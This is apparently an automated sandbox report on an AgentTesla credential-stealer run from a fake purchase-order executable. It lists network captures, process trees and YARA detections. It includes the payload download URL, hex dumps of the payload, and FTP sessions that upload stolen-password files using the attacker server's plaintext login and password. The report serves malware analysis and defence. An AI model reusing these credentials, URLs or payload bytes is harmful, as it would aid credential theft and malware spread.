                                            Oct 1, 2024 07:31:55.658544064 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.850820065 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.873261929 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.873579979 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.878339052 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.092916012 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.093657970 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.098526001 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.098622084 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.098704100 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.103605032 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.715498924 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.716213942 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.716299057 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.721067905 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.721389055 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.721436024 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.757123947 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.936228991 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.975864887 CEST4971521192.168.2.85.2.84.236
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 07:31:25.121555090 CEST | 52651 | 53 | 192.168.2.8 | 1.1.1.1
Oct 1, 2024 07:31:25.509732008 CEST | 53 | 52651 | 1.1.1.1 | 192.168.2.8
Oct 1, 2024 07:31:30.720931053 CEST | 60441 | 53 | 192.168.2.8 | 1.1.1.1
Oct 1, 2024 07:31:30.814199924 CEST | 53 | 60441 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 1, 2024 07:31:25.121555090 CEST | 192.168.2.8 | 1.1.1.1 | 0x72bf | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
Oct 1, 2024 07:31:30.720931053 CEST | 192.168.2.8 | 1.1.1.1 | 0x48ed | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 1, 2024 07:31:25.509732008 CEST | 1.1.1.1 | 192.168.2.8 | 0x72bf | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
Oct 1, 2024 07:31:30.814199924 CEST | 1.1.1.1 | 192.168.2.8 | 0x48ed | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
                                            • wymascensores.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 67.212.175.162 | 443 | 2944 | C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
Timestamp | Bytes transferred | Direction | Data

2024-10-01 05:31:26 UTC | 84 | OUT
GET /servex/Evzbwt.mp3 HTTP/1.1
Host: wymascensores.com
Connection: Keep-Alive

2024-10-01 05:31:26 UTC | 210 | IN
HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 05:31:25 GMT
Server: Apache
Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
Accept-Ranges: bytes
Content-Length: 1914880
Connection: close
Content-Type: audio/mpeg
                                            Data Ascii: 120511060911041F0A1F0F1F3706286C03000612041105110609171F151F3806286C03000612031104110511061E1C1F3906286C030006120609110411051F0F1F0A1F3A06286C030006120511060911041C1F0F1F3B06286C030006120411051106091F0D1F151F3C06286C03000612031104110511061A1C1F3D06286C030
                                            2024-10-01 05:31:26 UTC8000INData Raw: 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 32 30 39 37 30 30 30 30 30 30 32 30 34 30 30 30 30 30 30 30 35 39 46 45 30 45 32 37 30 30 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 32 37 30 30 39 43 32 30 36 46 30 30 30 30 30 30 32 30 33 42 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 32 30 44 35 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 39 39 43 32 30 33 31 30 30 30 30 30 30 32 30 32 35 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30
                                            Data Ascii: FE0C0300200C000000FE0C11009C2097000000204000000059FE0E2700FE0C0300200C000000FE0C27009C206F000000203B00000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200D00000020D50000002047000000599C2031000000202500000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200
                                            2024-10-01 05:31:26 UTC8000INData Raw: 32 35 31 37 32 38 42 43 30 33 30 30 30 36 31 31 30 30 31 31 30 37 32 38 42 44 30 33 30 30 30 36 31 33 31 38 32 38 42 45 30 33 30 30 30 36 31 33 30 31 31 31 30 31 31 31 31 38 31 37 37 33 45 36 30 30 30 30 30 41 32 35 31 31 32 42 31 36 31 31 32 42 38 45 36 39 32 38 42 46 30 33 30 30 30 36 32 35 32 38 43 30 30 33 30 30 30 36 37 45 37 38 30 31 30 30 30 34 32 38 43 31 30 33 30 30 30 36 31 31 30 31 32 38 43 32 30 33 30 30 30 36 32 38 43 33 30 33 30 30 30 36 32 38 43 34 30 33 30 30 30 36 31 31 30 31 32 38 43 35 30 33 30 30 30 36 32 38 43 35 30 33 30 30 30 36 32 38 43 36 30 33 30 30 30 36 32 30 30 30 30 30 30 30 30 30 32 38 44 38 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 42 30
                                            Data Ascii: 251728BC0300061100110728BD030006131828BE0300061301110111181773E600000A25112B16112B8E6928BF0300062528C00300067E7801000428C1030006110128C203000628C303000628C4030006110128C503000628C503000628C6030006200000000028D80300063A0F0000002620000000003804000000FE0C0B0
                                            2024-10-01 05:31:26 UTC8000INData Raw: 32 33 37 45 33 46 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 33 38 30 45 30 30 30 30 30 30 31 31 32 33 37 45 34 30 30 31 30 30 30 41 31 31 32 35 36 46 34 31 30 31 30 30 30 41 31 31 32 35 31 37 35 38 31 33 32 35 31 31 32 35 31 31 32 30 33 46 38 33 46 46 46 46 46 46 31 31 32 33 37 45 34 32 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 32 33 31 31 31 44 33 41 30 41 30 30 30 30 30 30 37 45 34 33 30 31 30 30 30 41 33 38 30 35 30 30 30 30 30 30 37 45 34 34 30 31 30 30 30 41 31 31 31 45 36 46 34 35 30 31 30 30 30 41 31 31 32 33 37 45 34 36 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 31 41 31 34 31 31 32 32 30 36 36 46 34 37 30 31 30 30 30 41 36 46 31 38 30 31 30 30 30 41 44 44 30 36 30 30 30 30 30 30 32 36 44 44 30 30 30 30 30 30 30 30 31
                                            Data Ascii: 237E3F01000A6F3C01000A380E00000011237E4001000A11256F4101000A112517581325112511203F83FFFFFF11237E4201000A6F3C01000A1123111D3A0A0000007E4301000A38050000007E4401000A111E6F4501000A11237E4601000A6F3C01000A111A141122066F4701000A6F1801000ADD0600000026DD000000001


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49710        67.212.175.162  443               6876  C:\Users\user\AppData\Roaming\Xpnzea.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-01 05:31:42 UTC  84                 OUT        GET /servex/Evzbwt.mp3 HTTP/1.1
                                                       Host: wymascensores.com
                                                       Connection: Keep-Alive
2024-10-01 05:31:42 UTC  210                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 01 Oct 2024 05:31:41 GMT
                                                       Server: Apache
                                                       Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
                                                       Accept-Ranges: bytes
                                                       Content-Length: 1914880
                                                       Connection: close
                                                       Content-Type: audio/mpeg


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49714        67.212.175.162  443               4260  C:\Users\user\AppData\Roaming\Xpnzea.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-01 05:31:50 UTC  84                 OUT        GET /servex/Evzbwt.mp3 HTTP/1.1
                                                       Host: wymascensores.com
                                                       Connection: Keep-Alive
2024-10-01 05:31:50 UTC  210                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 01 Oct 2024 05:31:49 GMT
                                                       Server: Apache
                                                       Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
                                                       Accept-Ranges: bytes
                                                       Content-Length: 1914880
                                                       Connection: close
                                                       Content-Type: audio/mpeg


                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                            Oct 1, 2024 07:31:31.443440914 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220-You are user number 2 of 100 allowed.
                                                220-Local time is now 08:31. Server port: 21.
                                                220-This is a private system - No anonymous login
                                                220-IPv6 connections are also welcome on this server.
                                                220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:31.443697929 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:31.663798094 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:31.663960934 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | PASS Fineboy777@
                                            Oct 1, 2024 07:31:31.951602936 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:32.171857119 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 504 Unknown command
                                            Oct 1, 2024 07:31:32.172070980 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | PWD
                                            Oct 1, 2024 07:31:32.392071962 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 257 "/" is your current location
                                            Oct 1, 2024 07:31:32.394761086 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | TYPE I
                                            Oct 1, 2024 07:31:32.614883900 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:32.618262053 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | PASV
                                            Oct 1, 2024 07:31:32.838507891 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 227 Entering Passive Mode (5,2,84,236,247,252)
                                            Oct 1, 2024 07:31:32.844326019 CEST | 49706 | 21 | 192.168.2.8 | 5.2.84.236 | STOR PW_user-841675_2024_10_01_01_31_29.html
                                            Oct 1, 2024 07:31:33.459727049 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 150 Accepted data connection
                                            Oct 1, 2024 07:31:33.680572987 CEST | 21 | 49706 | 5.2.84.236 | 192.168.2.8 | 226-File successfully transferred
                                                226 0.221 seconds (measured here), 1.42 Kbytes per second
                                            Oct 1, 2024 07:31:46.627922058 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220-You are user number 3 of 100 allowed.
                                                220-Local time is now 08:31. Server port: 21.
                                                220-This is a private system - No anonymous login
                                                220-IPv6 connections are also welcome on this server.
                                                220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:46.645164967 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:46.868467093 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:46.868599892 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | PASS Fineboy777@
                                            Oct 1, 2024 07:31:47.117877960 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:47.341084957 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 504 Unknown command
                                            Oct 1, 2024 07:31:47.341229916 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | PWD
                                            Oct 1, 2024 07:31:47.564277887 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 257 "/" is your current location
                                            Oct 1, 2024 07:31:47.564481974 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | TYPE I
                                            Oct 1, 2024 07:31:47.787836075 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:47.788686037 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | PASV
                                            Oct 1, 2024 07:31:48.011962891 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 227 Entering Passive Mode (5,2,84,236,240,72)
                                            Oct 1, 2024 07:31:48.017800093 CEST | 49712 | 21 | 192.168.2.8 | 5.2.84.236 | STOR PW_user-841675_2024_10_01_01_31_44.html
                                            Oct 1, 2024 07:31:48.641787052 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 150 Accepted data connection
                                            Oct 1, 2024 07:31:48.866142035 CEST | 21 | 49712 | 5.2.84.236 | 192.168.2.8 | 226-File successfully transferred
                                                226 0.224 seconds (measured here), 1.39 Kbytes per second
                                            Oct 1, 2024 07:31:54.746680975 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220-You are user number 3 of 100 allowed.
                                                220-Local time is now 08:31. Server port: 21.
                                                220-This is a private system - No anonymous login
                                                220-IPv6 connections are also welcome on this server.
                                                220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:54.750654936 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:54.970118046 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:54.972088099 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | PASS Fineboy777@
                                            Oct 1, 2024 07:31:55.214142084 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:55.433476925 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 504 Unknown command
                                            Oct 1, 2024 07:31:55.433727980 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | PWD
                                            Oct 1, 2024 07:31:55.653544903 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 257 "/" is your current location
                                            Oct 1, 2024 07:31:55.653718948 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | TYPE I
                                            Oct 1, 2024 07:31:55.873261929 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:55.873579979 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | PASV
                                            Oct 1, 2024 07:31:56.092916012 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 227 Entering Passive Mode (5,2,84,236,252,210)
                                            Oct 1, 2024 07:31:56.098704100 CEST | 49715 | 21 | 192.168.2.8 | 5.2.84.236 | STOR PW_user-841675_2024_10_01_01_31_52.html
                                            Oct 1, 2024 07:31:56.715498924 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 150 Accepted data connection
                                            Oct 1, 2024 07:31:56.936228991 CEST | 21 | 49715 | 5.2.84.236 | 192.168.2.8 | 226-File successfully transferred
                                                226 0.221 seconds (measured here), 1.42 Kbytes per second


                                            Target ID:0
                                            Start time:01:31:23
                                            Start date:01/10/2024
                                            Path:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe"
                                            Imagebase:0x520000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1485671738.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:01:31:27
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x3a0000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:01:31:40
                                            Start date:01/10/2024
                                            Path:C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\Xpnzea.exe"
                                            Imagebase:0x880000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1652064396.0000000004583000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 47%, ReversingLabs
                                            • Detection: 33%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:01:31:43
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x5a0000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:01:31:48
                                            Start date:01/10/2024
                                            Path:C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\Xpnzea.exe"
                                            Imagebase:0x2e0000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1739735884.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:9
                                            Start time:01:31:51
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x660000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:10%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:6.3%
                                              Total number of Nodes:378
                                              Total number of Limit Nodes:37
5e2f7d7 60536->60385 60540 5e2f79a 60539->60540 60542 5e20e50 VirtualAllocEx 60540->60542 60543 5e20e48 VirtualAllocEx 60540->60543 60541 5e2f7d7 60541->60385 60542->60541 60543->60541 60545 5e20e94 VirtualAllocEx 60544->60545 60547 5e20f0c 60545->60547 60547->60536 60549 5e20e50 VirtualAllocEx 60548->60549 60551 5e20f0c 60549->60551 60551->60536 60553 5e2e177 60552->60553 60554 5e2e199 60553->60554 60562 5e2e4d2 60553->60562 60567 5e2e547 60553->60567 60554->60482 60558 5e2e177 60557->60558 60559 5e2e4d2 2 API calls 60558->60559 60560 5e2e547 2 API calls 60558->60560 60561 5e2e199 60558->60561 60559->60561 60560->60561 60561->60482 60563 5e2e4e0 60562->60563 60572 5e20538 60563->60572 60576 5e2052c 60563->60576 60568 5e2e56f 60567->60568 60570 5e20538 CreateProcessA 60568->60570 60571 5e2052c CreateProcessA 60568->60571 60569 5e2ea79 60570->60569 60571->60569 60573 5e2053d CreateProcessA 60572->60573 60575 5e207b4 60573->60575 60577 5e20530 CreateProcessA 60576->60577 60579 5e207b4 60577->60579 60584 265d030 60585 265d048 60584->60585 60586 265d0a3 60585->60586 60588 5eedbd0 60585->60588 60589 5eedc29 60588->60589 60592 5eee160 60589->60592 60590 5eedc5e 60593 5eee18d 60592->60593 60594 5eed008 VirtualProtect 60593->60594 60596 5eee323 60593->60596 60595 5eee314 60594->60595 60595->60590 60596->60590 60158 2787de0 60159 2787dfa 60158->60159 60160 2787e0a 60159->60160 60164 5ee6e1e 60159->60164 60167 5ee73f3 60159->60167 60171 5ee6234 60159->60171 60175 5eed008 60164->60175 60168 5ee7412 60167->60168 60170 5eed008 VirtualProtect 60168->60170 60169 5ee01d7 60170->60169 60172 5ee6253 60171->60172 60174 5eed008 VirtualProtect 60172->60174 60173 5ee627a 60174->60173 60177 5eed02f 60175->60177 60179 5eed4e8 60177->60179 60180 5eed531 VirtualProtect 60179->60180 60182 5ee01d7 60180->60182 60601 5e22f08 60602 5e22f09 60601->60602 60606 5e22f48 60602->60606 60611 5e22f39 60602->60611 60603 5e22f33 60607 5e22f75 60606->60607 60608 5e22fdc 60607->60608 60609 5e21498 
